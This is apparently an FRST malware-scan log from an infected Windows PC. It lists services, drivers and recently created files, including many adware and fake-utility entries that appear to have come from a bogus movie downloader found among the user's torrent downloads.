    CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S2 AmazingTab; C:\Program Files\amztab\amztab.exe [383488 2016-01-09] () [File not signed]
    S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
    S2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe [538112 2016-01-09] () [File not signed]
    S2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [211584 2012-08-10] (Qualcomm Atheros Commnucations) [File not signed]
    S2 BrcmCardReader; C:\Program Files\Broadcom\MemoryCard\BrcmCardReader.exe [176640 2012-08-20] (Broadcom Corp.) [File not signed]
    S2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
    S2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
    S2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
    S2 cmdidx; C:\Program Files\cmdidx\cmdidx.exe [383488 2016-01-09] () [File not signed]
    S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
    S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
    S2 extradoynldownkzhd; C:\Users\owner\AppData\Local\Donelectronics.exe [28160 2016-01-09] () [File not signed]
    S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
    S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
    S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
    S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
    S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
    S2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-11-02] (NTI Corporation)
    S2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-10-09] (Dritek System INC.)
    S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [836176 2015-12-14] (Valve Corporation) [File not signed]
    S2 Task Server; C:\Program Files\Task Server\TaskServer.exe [796160 2016-01-09] (Copyright © Microsoft 2015) [File not signed]
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
    S2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-07-31] (Atheros) [File not signed]
    S2 Gejdiubx; "C:\Users\owner\AppData\Roaming\RujgAjueocf\Remdhuus.exe" -cms [X]

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-08-10] (Qualcomm Atheros)
    S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows (R) Win 7 DDK provider)
    S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows (R) Win 7 DDK provider)
    R0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
    S3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
    S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-10] (Malwarebytes)
    S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
    S3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
    R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-10-09] (Dritek System Inc.)
    S3 usbrndis6; C:\Windows\system32\DRIVERS\usb80236.sys [20992 2013-08-22] (Microsoft Corporation)
    S3 voxaldriver; C:\Windows\system32\DRIVERS\voxaldriverx64.sys [34512 2015-10-26] ()
    S3 vpnva; C:\Windows\system32\DRIVERS\vpnva64-6.sys [52592 2014-10-16] (Cisco Systems, Inc.)
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44024 2015-02-03] (Microsoft Corporation)
    S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [264000 2015-02-03] (Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
    S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X]
    S1 swsedrvr_vw_1_10_0_25; system32\drivers\swsedrvr_vw_1_10_0_25.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-01-10 18:13 - 2016-01-10 19:21 - 00000000 ____D C:\FRST
    2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Task Service
    2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Scan Service
    2016-01-10 15:07 - 2016-01-10 15:09 - 00140288 _____ (Microsoft) C:\WINDOWS\system32\MalwareScanner.exe
    2016-01-10 15:07 - 2016-01-10 15:09 - 00071168 _____ (Microsoft) C:\WINDOWS\system32\WindowsLock.exe
    2016-01-10 14:30 - 2016-01-10 15:21 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2016-01-10 14:30 - 2016-01-10 14:56 - 00001112 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
    2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
    2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Malwarebytes
    2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
    2016-01-10 14:30 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
    2016-01-10 14:30 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
    2016-01-10 14:30 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2016-01-09 21:13 - 2016-01-10 16:13 - 00000000 ____D C:\Users\owner\AppData\Local\CrashDumps
    2016-01-09 21:08 - 2016-01-10 14:56 - 00001422 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    2016-01-09 21:00 - 2016-01-09 21:00 - 00019912 ____H C:\WINDOWS\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
    2016-01-09 21:00 - 2016-01-09 21:00 - 00000000 ____D C:\ProgramData\fc7235fa-41a3-1
    2016-01-09 20:58 - 2016-01-09 20:58 - 00019720 ____H C:\WINDOWS\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job
    2016-01-09 20:58 - 2016-01-09 20:58 - 00000000 ____D C:\ProgramData\ad8a10da-14d7-1
    2016-01-09 20:57 - 2016-01-09 20:57 - 00000000 ____D C:\Program Files (x86)\ExploreTech
    2016-01-09 20:11 - 2016-01-09 20:11 - 00000000 ____D C:\Program Files (x86)\predm
    2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\Users\owner\AppData\Local\NPE
    2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\ProgramData\Norton
    2016-01-09 19:33 - 2016-01-10 19:30 - 00726406 _____ C:\WINDOWS\ntbtlog.txt
    2016-01-09 19:24 - 2016-01-09 19:24 - 00003284 _____ C:\WINDOWS\System32\Tasks\psv_Temptough
    2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (5).exe
    2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (4).exe
    2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (3).exe
    2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (2).exe
    2016-01-09 18:43 - 2016-01-09 18:43 - 00002782 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
    2016-01-09 18:42 - 2016-01-10 14:56 - 00000876 _____ C:\Users\Public\Desktop\CCleaner.lnk
    2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\Program Files\CCleaner
    2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513.exe
    2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (1).exe
    2016-01-09 18:16 - 2016-01-09 18:16 - 00003242 _____ C:\WINDOWS\System32\Tasks\IBUpd2
    2016-01-09 18:15 - 2016-01-09 18:15 - 00022184 _____ (Corporation) C:\WINDOWS\system32\Drivers\sdfhgdf.sys
    2016-01-09 18:15 - 2016-01-09 18:15 - 00003406 _____ C:\WINDOWS\System32\Tasks\RSPro
    2016-01-09 18:14 - 2016-01-09 18:14 - 00000008 _____ C:\END
    2016-01-09 18:09 - 2016-01-10 16:09 - 00000282 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
    2016-01-09 18:09 - 2016-01-09 19:14 - 00000282 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
    2016-01-09 18:09 - 2016-01-09 18:09 - 00023024 _____ C:\WINDOWS\System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}
    2016-01-09 18:09 - 2016-01-09 18:09 - 00003568 _____ C:\WINDOWS\System32\Tasks\System Healer Task
    2016-01-09 18:09 - 2016-01-09 18:09 - 00003232 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
    2016-01-09 18:09 - 2016-01-09 18:09 - 00002832 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
    2016-01-09 18:09 - 2016-01-09 18:09 - 00002536 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-78e1-0
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-3443-1
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-2473-0
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-09a5-1
    2016-01-09 18:00 - 2016-01-09 18:00 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
    2016-01-09 17:22 - 2016-01-09 17:22 - 00003270 _____ C:\WINDOWS\System32\Tasks\psv_Tripplezap
    2016-01-09 17:18 - 2016-01-09 17:18 - 00000015 _____ C:\WINDOWS\system32\config.conf
    2016-01-09 17:18 - 2016-01-09 17:18 - 00000000 ____D C:\WINDOWS\system32\jurk
    2016-01-09 17:10 - 2016-01-09 17:59 - 00000000 ____D C:\Users\owner\AppData\Local\DailyWiki
    2016-01-09 17:08 - 2016-01-09 17:57 - 00003426 _____ C:\WINDOWS\System32\Tasks\Olunnuag
    2016-01-09 16:42 - 2016-01-10 16:09 - 00000280 _____ C:\WINDOWS\Tasks\Goose.job
    2016-01-09 16:42 - 2016-01-09 19:26 - 00004720 _____ C:\WINDOWS\SysWOW64\Kefzha.ini
    2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\SysWOW64\KefzhaOff.ini
    2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\system32\KefzhaOff.ini
    2016-01-09 16:42 - 2016-01-09 16:42 - 00003336 _____ C:\WINDOWS\System32\Tasks\Foebyyc
    2016-01-09 16:42 - 2016-01-09 16:42 - 00002474 _____ C:\WINDOWS\System32\Tasks\Goose
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\Company
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Tempfolder
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds365
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\uninst
    2016-01-09 16:42 - 2016-01-09 15:28 - 00768376 _____ C:\WINDOWS\system32\Kefzha64.dll
    2016-01-09 16:42 - 2016-01-09 15:28 - 00289144 _____ C:\WINDOWS\SysWOW64\Kefzha.dll
    2016-01-09 16:40 - 2016-01-09 16:40 - 00004186 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update
    2016-01-09 16:40 - 2016-01-09 16:40 - 00004176 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core
    2016-01-09 16:38 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Setup Support for Looksafe
    2016-01-09 16:38 - 2016-01-09 16:38 - 00003690 _____ C:\WINDOWS\System32\Tasks\GTNU_635879831232953538
    2016-01-09 16:38 - 2016-01-09 16:38 - 00003338 _____ C:\WINDOWS\System32\Tasks\GNU_635879831225933307
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004988 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004956 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004944 _____ C:\WINDOWS\System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004932 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004930 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004906 _____ C:\WINDOWS\System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412
    2016-01-09 16:36 - 2016-01-09 16:36 - 00003258 _____ C:\WINDOWS\System32\Tasks\Easy Driver Pro Schedule
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\WINDOWS\system32\Express
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Server
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Host
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Svc Host
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\IIS
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Explore
    2016-01-09 16:34 - 2016-01-09 16:34 - 00003828 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1452386042
    2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Roaming\Opera Software
    2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Local\Opera Software
    2016-01-09 16:33 - 2016-01-10 16:09 - 00000352 ____H C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job
    2016-01-09 16:33 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Opera
    2016-01-09 16:33 - 2016-01-09 20:15 - 00000000 ____D C:\Program Files\Sound+
    2016-01-09 16:33 - 2016-01-09 16:33 - 00003360 _____ C:\WINDOWS\System32\Tasks\UXJOVQQVBISGUWLJ
    2016-01-09 16:33 - 2016-01-09 16:33 - 00002854 _____ C:\WINDOWS\System32\Tasks\LSNHDG1
    2016-01-09 16:33 - 2016-01-09 16:33 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e
    2016-01-09 16:32 - 2016-01-09 21:00 - 00000000 ____D C:\Program Files (x86)\Probit Software
    2016-01-09 16:32 - 2016-01-09 16:32 - 00041472 _____ C:\Users\owner\AppData\Local\Donelectronics.dat
    2016-01-09 16:32 - 2016-01-09 16:32 - 00028160 _____ C:\Users\owner\AppData\Local\Donelectronics.exe
    2016-01-09 16:32 - 2016-01-09 16:32 - 00000187 _____ C:\Users\owner\AppData\Local\Donelectronics.exe.config
    2016-01-09 16:32 - 2016-01-09 16:32 - 00000000 ____D C:\Program Files\cmdidx
    2016-01-09 16:31 - 2016-01-10 16:08 - 00000000 ____D C:\ProgramData\ApplicationHosting
    2016-01-09 16:31 - 2016-01-09 16:31 - 05142944 _____ (hxxp://spring-files.com) C:\Users\owner\Downloads\Into_the_Wild_2007_1080p_BrRip_x264_-_YIFY_downloader.exe
    2016-01-09 16:31 - 2016-01-09 16:31 - 00004144 _____ C:\WINDOWS\System32\Tasks\WebDnsio2-daily
    2016-01-09 16:31 - 2016-01-09 16:29 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
    2016-01-09 16:30 - 2016-01-09 16:31 - 00000000 ____D C:\Program Files (x86)\WebDnsio
    2016-01-09 16:30 - 2016-01-09 16:30 - 00005164 _____ C:\WINDOWS\System32\Tasks\WebDnsio2
    2016-01-09 16:29 - 2016-01-09 16:29 - 01017652 _____ C:\Users\owner\Downloads\Into The Wild 2007 1080p BrR Downloader.rar
    2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ___HD C:\Program Files\AmazingTab
    2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ____D C:\Program Files\amztab
    2016-01-09 16:27 - 2016-01-09 16:30 - 00000022 _____ C:\Users\owner\Downloads\into.the.wild.2007.1080p..zip-.zip
    2016-01-09 15:59 - 2016-01-09 15:59 - 00033072 _____ C:\Users\owner\Downloads\Deliver Us from Evil 2014.torrent
    2016-01-09 15:40 - 2016-01-09 15:40 - 00019657 _____ C:\Users\owner\Downloads\[kat.cr]devil.s.knot.2013.1080p.brrip.x264.yify.torrent
    2016-01-09 15:22 - 2016-01-09 15:22 - 00013243 _____ C:\Users\owner\Downloads\[kat.cr]enemy.2013.1080p.x264.dd5.1.en.nl.subs.asian.torrenz.torrent
    2016-01-09 14:59 - 2016-01-09 14:59 - 00019431 _____ C:\Users\owner\Downloads\[kat.cr]leviathan.2014.1080p.brrip.x264.ac3.jyk.torrent
    2016-01-09 14:38 - 2016-01-09 14:38 - 00118580 _____ C:\Users\owner\Downloads\[kat.cr]meru.2015.brrip.xvid.ac3.evo.torrent
    2016-01-09 14:18 - 2016-01-09 14:18 - 00087738 _____ C:\Users\owner\Downloads\[kat.cr]selma.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
    2016-01-09 13:44 - 2016-01-09 13:44 - 00019546 _____ C:\Users\owner\Downloads\[kat.cr]dilwale.2015.desiscr.950mb.torrent
    2016-01-09 13:29 - 2016-01-09 13:29 - 00028395 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2.hdrip.torrent
    2016-01-09 13:16 - 2016-01-09 13:16 - 00192082 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2012.bdrip.xvid.eng.ita.ac3.torrent
    2016-01-09 12:46 - 2016-01-09 12:46 - 00067266 _____ C:\Users\owner\Downloads\[kat.cr]straight.outta.compton.2015.dc.1080p.bluray.h264.aac.rarbg.torrent
    2016-01-09 12:19 - 2016-01-09 12:19 - 00140864 _____ C:\Users\owner\Downloads\[kat.cr]whiplash.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
    2016-01-09 12:08 - 2016-01-09 12:08 - 00017330 _____ C:\Users\owner\Downloads\[kat.cr]chef.2014.2ndtimearound.torrent
    2016-01-09 12:07 - 2016-01-09 12:07 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (2).torrent
    2016-01-09 12:06 - 2016-01-09 12:06 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (1).torrent
    2016-01-09 12:05 - 2016-01-09 12:05 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw.torrent
    2016-01-09 11:50 - 2016-01-09 11:50 - 00019667 _____ C:\Users\owner\Downloads\[kat.cr]nightcrawler.2014.1080p.brrip.x264.yify.torrent
    2016-01-09 11:30 - 2016-01-09 11:30 - 00014728 _____ C:\Users\owner\Downloads\[kat.cr]diablo.2016.hdrip.xvid.ac3.evo.torrent
    2016-01-09 10:55 - 2016-01-09 10:55 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu (1).torrent
    2016-01-09 10:54 - 2016-01-09 10:54 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu.torrent
    2016-01-09 10:45 - 2016-01-09 10:45 - 00031210 _____ C:\Users\owner\Downloads\[kat.cr]the.little.prince.2015.bluray.1080p.dts.hd.ma.5.1.x264.mteam.mkv.torrent
    2016-01-09 10:21 - 2016-01-09 10:21 - 00010218 _____ C:\Users\owner\Downloads\[kat.cr]mad.max.fury.road.2015.720p.brrip.x264.yify.torrent
    2016-01-09 10:12 - 2016-01-09 10:12 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg (1).torrent
    2016-01-09 10:10 - 2016-01-09 10:10 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg.torrent
    2016-01-09 09:54 - 2016-01-09 09:54 - 00019417 _____ C:\Users\owner\Downloads\[kat.cr]san.andreas.2015.1080p.brrip.x264.yify.torrent
    2016-01-09 09:38 - 2016-01-09 09:38 - 00106326 _____ C:\Users\owner\Downloads\[kat.cr]the.sponge.bob.movie.sponge.out.of.water.2015.cam.xvid.vain.torrent
    2016-01-09 09:32 - 2016-01-09 09:32 - 00022617 _____ C:\Users\owner\Downloads\[kat.cr]divergent.2014.1080p.bluray.x264.ac3.dd5.1.inam.torrent
    2016-01-09 09:12 - 2016-01-09 09:12 - 00120298 _____ C:\Users\owner\Downloads\[kat.cr]spy.2015.hc.hdrip.xvid.ac3.evo.torrent
    2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (2).tif
    2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (1).tif
    2016-01-08 11:43 - 2016-01-08 11:43 - 14655654 _____ C:\Users\owner\Downloads\scan4.tif
    2016-01-07 07:28 - 2016-01-10 16:10 - 00000000 ____D C:\Users\owner\AppData\LocalLow\uTorrent
    2016-01-04 17:09 - 2016-01-08 20:25 - 00000000 ____D C:\Users\owner\AppData\Roaming\OBS
    2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files\OBS
    2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files (x86)\OBS
    2016-01-04 17:04 - 2016-01-04 17:06 - 68037144 _____ C:\Users\owner\Downloads\OBS_0_657b_With_Browser_Installer.exe
    2016-01-03 21:42 - 2016-01-10 14:56 - 00001619 _____ C:\Users\Public\Desktop\League of Legends.lnk
    2016-01-03 21:42 - 2016-01-03 21:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
    2016-01-03 21:42 - 2008-07-12 08:18 - 03851784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_39.dll
    2016-01-03 21:42 - 2008-07-12 08:18 - 01493528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_39.dll
    2016-01-03 21:42 - 2008-07-12 08:18 - 00467984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_39.dll
    2016-01-03 21:23 - 2016-01-03 21:42 - 00000000 __SHD C:\AI_RecycleBin
    2015-12-31 09:58 - 2016-01-08 11:45 - 00076288 ___SH C:\Users\owner\Downloads\Thumbs.db
    2015-12-28 17:04 - 2015-12-28 17:04 - 09479872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
    2015-12-28 10:18 - 2015-12-28 10:18 - 00000000 ____D C:\Users\owner\AppData\Roaming\Gyazo
    2015-12-28 10:16 - 2015-12-29 08:17 - 00000000 ____D C:\Program Files (x86)\Gyazo
    2015-12-28 10:16 - 2015-12-28 10:16 - 09986504 _____ (Nota Inc. ) C:\Users\owner\Downloads\Gyazo-3.1.6.exe
    2015-12-28 10:16 - 2015-12-28 10:16 - 00003400 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachineDaily
    2015-12-28 10:16 - 2015-12-28 10:16 - 00003274 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachine
    2015-12-28 10:16 - 2015-12-28 10:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gyazo
    2015-12-27 17:52 - 2015-12-27 17:52 - 00000000 ____D C:\Users\owner\AppData\Local\Hewlett-Packard
    2015-12-27 17:28 - 2015-12-27 17:28 - 00000000 ____D C:\Users\owner\AppData\Roaming\Hewlett-Packard
    2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\System.sav
    2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
    2015-12-27 17:21 - 2015-12-27 17:21 - 00000000 ____D C:\Users\owner\AppData\Roaming\hpqLog
    2015-12-27 17:05 - 2015-12-27 17:05 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
    2015-12-27 17:04 - 2015-12-27 17:22 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
    2015-12-27 17:02 - 2015-12-27 17:02 - 03795680 _____ (Oleg N. Scherbakov) C:\Users\owner\Downloads\HPSupportSolutionsFramework-12.0.30.219.exe
    2015-12-21 23:27 - 2016-01-10 14:56 - 00002707 _____ C:\Users\Public\Desktop\Skype.lnk
    2015-12-21 23:27 - 2015-12-21 23:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
    2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks
    2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\Program Files (x86)\Bethesda Softworks
    2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Users\owner\AppData\Local\PAYDAY 2
    2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
    2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
    2015-12-13 15:06 - 2016-01-10 14:56 - 00001188 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Express Zip File Compression.lnk
